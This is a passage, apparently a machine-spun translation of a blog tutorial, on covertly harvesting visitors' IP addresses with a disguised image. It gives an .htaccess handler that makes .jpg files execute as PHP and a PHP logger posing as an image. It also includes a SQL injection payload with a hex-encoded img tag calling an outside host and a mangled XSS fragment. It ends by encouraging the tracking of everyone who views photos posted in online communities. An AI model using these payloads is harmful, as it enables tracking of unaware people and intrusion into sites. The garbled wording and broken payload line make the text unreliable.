若何經由過程一張照片來獵取IP地點？

本日早上起床以後，我看到一篇關於應用sql註入語句獵取ip地點的文章，對此我很感興致，就細心瀏覽瞭一下，在讀完這篇文章以後，我有瞭一個新的設法主意：

經由過程對htaccess的應用，完成用一張照片獵取別人的ip地點。

在本教程中，我們將進修若何用一張照片來竊取ip地點。我的設法主意是經由過程修正.htaccess文件，將jpg文件看成php文件來剖析。

上面就是我們須要向.htaccess中增加的代碼：

AddHandler application/x-httpd-php5 .jpg

然後將上面的代碼復制到記事本中，定名為grabber.jpg

<?php

$fh = fopen(‘ip_list.txt’, ‘a’);

fwrite($fh, $_SERVER[‘REMOTE_ADDR’]."

“);

fclose($fh);

$im = imagecreatefromjpeg(“n00b.png");

header(‘Content-Type: image/jpeg’);

imagejpeg($im);

imagedestroy($im);

?>

將grabber.jpg的權限設置為755，然後再找一張照片，將其定名為n00b.png，接著放到與grabber.jpg雷同的目次當中。

就如許，統統事情停當瞭。當他人閱讀grabber.jpg這張照片的時刻，他的ip地點就會被記載下來。

（譯者註：須要把這些器械上傳至我們的小我網站空間中）

POC：

(譯者註：作者這裡貼瞭一張可獵取ip的演示照片，為瞭人人的隱私，我未將其貼出，讀者可自行去作者博客檢察)

至此，我們的照片已能夠開端事情瞭。

接著我還想解釋一下若何應用SQLi來獵取ip地點。實在應用照片來竊取ip地點非常快速，我們沒有來由去應用SQLi這類辦法，然則為瞭讓讀者獵取到更多的常識，我照樣解釋一下吧：

/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

如今，再說一下若何應用xss來獵取ip地點：

/2016/0411/1460368129852.jpg" alt="經由過程照片獵取IP地點 SQL註入語句 SQL註入 SQL註入進擊">&submit=Search

好瞭，就是這些瞭。

我們能夠用這個技能做很多風趣的工作，究竟上大部門社區都許可我們宣佈一些照片，以是我們能夠用這個辦法去獵取全部拜訪到我們照片的人的ip地點。

感謝您的瀏覽，Happy Hacking！

註：相幹網站扶植技能瀏覽請移步到建站教程頻道。

>> 檢察更多類似文章